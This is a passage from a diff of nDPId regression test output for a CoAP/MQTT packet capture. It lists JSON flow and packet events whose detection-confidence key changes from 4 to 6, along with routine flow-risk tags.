{"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090926676,"flow_last_seen":1375090926676,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1375090926676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1375090926676,"pkt":"uCfrprIvACTop0mhht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADxEoWMwAfdD1AAs6gt3N0b3JhZ2X\/bXlyZXNvdXJjZQ=="} -00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090926676,"flow_last_seen":1375090926676,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090926676,"flow_last_seen":1375090926676,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1375090926676,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1375090926735,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1375090926735,"pkt":"ACTop0mhuCfrprIvht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjPESgAfeP9gQc6gh3N0b3JhZ2UKbXlyZXNvdXJjZQ=="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1375090935026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":73,"pkt_l4_len":19,"thread_ts_msec":1375090935026,"pkt":"uCfrprIvACTop0mhht1gAAAAABMRQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADxEoWMwATY+NAA86h\/215ZGF0YQ=="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090935240,"flow_last_seen":1375090935240,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1375090935240,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1375090935240,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1375090935240,"pkt":"uCfrprIvACTop0mhht1gAAAAACYRQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADtuMWMwAmaNlAA5Uit3N0b3JhZ2UKbXlyZXNvdXJjZf9teWRhdGE="} -00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090935240,"flow_last_seen":1375090935240,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1375090935240,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090935240,"flow_last_seen":1375090935240,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1375090935240,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1375090935293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":66,"pkt_l4_len":12,"thread_ts_msec":1375090935293,"pkt":"ACTop0mhuCfrprIvht1gAAAAAAwRQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjO24wAMxd1gRJUi"} -00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090528017,"flow_last_seen":1375090529165,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1375090935293,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090528017,"flow_last_seen":1375090529165,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1375090935293,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1375091005616,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1375091005616,"pkt":"uCfrprIvACTop0mhht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADtuMWMwAfsCNAAZUjt3N0b3JhZ2UKbXlyZXNvdXJjZQ=="} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":436,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1455907243976} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455907243976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907243976,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELhAAIAG+F7AqDgBwKg4ZdESRF16higakEiEGVAYAQAwoAAAwAAAAAAA"} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455907243977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907243977,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqrABAAEAGnRbAqDhlwKg4AURd0RKQSIQZeoYoHFAYAOXx0wAA0AA="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455907244175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907244175,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELlAAIAG+F\/AqDgBwKg4ZdESRF16higckEiEG1AQAQDwpgAAAAAAAAAA"} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1375090935240,"flow_last_seen":1375091022272,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1375090935240,"flow_last_seen":1375091022272,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELpAAIAG+FzAqDgBwKg4ZdETRF1NYgogm49Jd1AYAQCrGAAAwAAAAAAA"} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455907258332,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907258332,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqf0dAAEAGyc\/AqDhlwKg4AURd0RObj0l3TWIKIlAYAOXx0wAA0AA="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455907258532,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907258532,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELtAAIAG+F3AqDgBwKg4ZdETRF1NYgoim49JeVAQAQBrHwAAAAAAAAAA"} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907267002,"flow_last_seen":1455907267002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1455907267002,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455907267002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAA0ELxAAIAG+FDAqDgBwKg4ZdEYRF3fAvFmAAAAAIACIAB3eQAAAgQFtAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455907267002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1455907267002,"pkt":"CAAnAERyCAAnmO\/hCABFAAA0AABAAEAGSQ3AqDhlwKg4AURd0RiuSO3C3wLxZ4ASchDx3QAAAgQFtAEBBAIBAwMH"} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455907267002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907267002,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoEL1AAIAG+FvAqDgBwKg4ZdEYRF3fAvFnrkjtw1AQAQA7MAAAAAAAAAAA"} 